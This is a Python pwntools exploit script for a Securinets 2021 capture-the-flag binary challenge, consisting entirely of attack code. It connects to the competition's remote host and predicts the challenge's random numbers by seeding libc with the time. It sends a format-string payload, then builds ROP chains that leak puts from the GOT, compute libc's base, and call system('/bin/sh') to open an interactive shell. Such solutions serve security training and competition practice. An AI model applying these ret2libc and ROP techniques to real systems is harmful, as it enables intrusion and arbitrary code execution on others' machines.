securitnet2021-final

spinit.py

from pwn import *
from ctypes import *
from time import sleep

context.log_level = 'debug'

rlibc = CDLL('./libc.so')
rlibc.srand(rlibc.time(0))

# p = process('./chall')
p = remote('pwn1.f21.ctfsecurinets.com', 21251)
e = ELF('./chall')
libc = ELF('./libc.so')

for i in range(1000):
    n = rlibc.rand() % 80

    if n >= 70:
        p.sendlineafter(':', 'n')

        break
    else:
        p.sendlineafter(':', 'y')


payload = b'a'*64
payload += b'%s\0'

p.sendafter(':', payload)

pop_rdi = 0x401403
ret = 0x401404

payload = b'a'*0x20
payload += p64(0x404800)
payload += p64(pop_rdi)
payload += p64(e.got['puts'])
payload += p64(ret)
payload += p64(e.plt['puts'])
payload += p64(0x401343)

p.sendlineafter('?', payload)

p.recvline()
p.recvline()

leak = p.recvline()[:-1]
puts = u64(leak + b'\0\0')
print(hex(puts))
libc_base = puts - libc.sym['puts']
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))
print(hex(libc_base))
print(hex(system))
print(hex(binsh))

payload = b'a'*0x28
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(ret)
payload += p64(system)
payload += p64(0xffff)

p.sendline(payload)
p.interactive()